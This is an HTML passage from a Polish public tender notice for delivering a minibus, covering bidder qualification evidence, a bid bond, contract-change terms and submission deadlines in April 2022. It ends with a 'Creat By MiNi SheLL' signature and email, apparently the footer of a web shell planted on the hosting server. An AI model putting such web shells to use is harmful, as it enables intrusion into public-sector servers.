powtarzających się lub ciągłych<br/>nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; Zamawiający uzna<br/>warunek za spełniony, jeżeli Wykonawca wykaże, że w tym okresie<br/>wykonał:<br/>- co najmniej jedną dostawę mikrobusa, o wartości brutto minimum 150.000,00 PLN. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)oświadczenie Wykonawcy,<br/>w zakresie art. 108 ust. 1 punkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16<br/>lutego 2007 roku o ochronie konkurencji i konsumentów (Dz. U. z 2021 roku poz. 275), z innym Wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej – załącznik Nr 3 do Specyfikacji Warunków Zamówienia;<br/>2)odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 punkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których<br/>mowa w ust. 4 punkt 2, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że:<br/>a)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a<br/>jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy<br/>zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były<br/>wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy - załącznik Nr 7 do Specyfikacji Warunków Zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z załącznikiem Nr 1 do Specyfikacji Warunków Zamówienia. Wraz z<br/>ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie, o którym mowa w Rozdziale X ust. 1 Specyfikacji Warunków Zamówienia (załącznik Nr 2 do Specyfikacji<br/>Warunków Zamówienia);<br/>2) oświadczenie o podwykonawcach (załącznik Nr 4 do Specyfikacji Warunków Zamówienia);<br/>3) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 Specyfikacji Warunków Zamówienia (jeżeli<br/>dotyczy);<br/>4) dowód wniesienia wadium (jeżeli zabezpieczenie wadialne zostało wniesione w formie niepieniężnej);<br/>5) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy);<br/>6) pełnomocnictwo dla pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udział w postępowaniu<br/>- dotyczy ofert składanych przez Wykonawców biorących<br/>wspólnie udział w postępowaniu;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>dostawy wykonają poszczególni Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 2.000,00 PLN (słownie: dwa tysiące<br/>złotych 00/100 złotych). 2. Wadium wnosi się przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w<br/>Rozdziale<br/>X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>dostawy wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zam. przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art.<br/>454-455 ustawy Prawo zamówień publicznych oraz wskazanym<br/>we Wzorze Umowy, stanowiącym załącznik Nr 5 do Specyfikacji Warunków Zamówienia. Zmiana umowy wymaga dla swej<br/>ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej w postaci aneksu. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie<br/>której dokonano wyboru Wykonawcy, za wyjątkiem okoliczności<br/>przewidzianych w niniejszej Specyfikacji Warunków Zamówienia i/lub ogłoszeniu o zamówieniu. Zamawiający dopuszcza<br/>zmiany postanowień zawartej umowy w następujących okolicznościach<br/>i przypadkach:<br/>1)Zmiany terminu realizacji umowy:<br/>a)jeżeli zmiana jest konieczna z powodu przedłużającej się procedury wyboru najkorzystniejszej oferty,<br/>b)jeżeli zmiana jest konieczna z powodu złożenia odwołania,<br/>c)jeżeli zmiana jest konieczna z przyczyn losowych uniemożliwiających realizację zamówienia w zakładanym terminie.<br/>W przypadku wystąpienia którejkolwiek z wyżej wymienionych okoliczności, termin wykonania umowy może ulec<br/>odpowiedniemu przedłużeniu, nie dłużej jednak niż o okres trwania tych<br/>okoliczności.<br/>2)Zmiany terminów i warunków płatności:<br/>a)będące następstwem korzystnych dla Zamawiającego rozwiązań<br/>zaproponowanych przez Wykonawcę,<br/>b)w przypadku zmiany obowiązującej stawki podatku VAT zmianie może ulec cena brutto, stawka podatku VAT oraz jego<br/>wartość, pod warunkiem, że cena netto nie ulegnie zwiększeniu,<br/>c)ze względu na okoliczności, leżące po stronie Zamawiającego, których nie można było przewidzieć w chwili wszczęcia<br/>postępowania, w wyniku którego zawarto umowę.<br/>3)Zmiany technologiczne, a w szczególności pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji<br/>pozwalających na zaoszczędzenie kosztów realizacji przedmiotu<br/>umowy lub kosztów eksploatacji dostarczonego przedmiotu umowy.<br/>4)Zmiany sposobu spełnienia świadczenia w przypadkach, gdy jest to uzasadnione potrzebami Zamawiającego:<br/>a)zmiana terminu dostawy, która nie może pociągać za sobą zmiany ceny,<br/>b)zmiana zasad dokonania odbioru przedmiotu umowy, jeśli nie zmniejszy to zasad bezpieczeństwa i nie spowoduje<br/>zwiększenia kosztów dokonywania odbioru, które obciążałyby Zamawiającego,<br/>c)zmiana treści dokumentów przedstawianych wzajemnie przez Strony w trakcie realizacji umowy lub sposobu<br/>informowania o realizacji umowy,<br/>5)Zmiana podwykonawcy, powierzenie wykonania części zamówienia podwykonawcy, zmiana zakresu wykonania części<br/>zamówienia przez podwykonawcę.<br/>6)Pozostałe zmiany do umowy:<br/>a)w przypadku zaistnienia sytuacji, w których wykonanie umowy w pierwotnym okresie byłoby dla Zamawiającego<br/>niekorzystne lub niezasadne,<br/>b)zmiany dotyczące nazwy i siedziby Wykonawcy, jego formy organizacyjno - prawnej, numerów kont bankowych oraz<br/>innych danych identyfikacyjnych w trakcie trwania umowy lub następstwo<br/>prawne,<br/>c)zmiany mające na celu poprawę oczywistych omyłek pisarskich i rachunkowych w umowie,<br/>d)wydłużenie okresu gwarancji o dowolny okres.<br/>7)Dopuszczalne są zmiany do umowy, które wystąpiły wskutek wystąpienia siły wyższej uniemożliwiającej wykonanie<br/>przedmiotu umowy zgodnie ze Specyfikacją Warunków Zamówienia.<br/>7.Dokonanie zmiany umowy w powyższych zakresach z inicjatywy Wykonawcy wymaga uprzedniego złożenia na piśmie<br/>prośby (wniosku) Wykonawcy, wykazującej zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie.<br/>8.Wszelkie zmiany umowy są uprawnieniem, a nie zobowiązaniem i mogą być dokonywane przez umocowanych<br/>przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej, w drodze<br/>aneksu do umowy, pod rygorem nieważności, chyba że zapisy umowy stanowią inaczej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP https://epuap.gov.pl/wps/portal i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com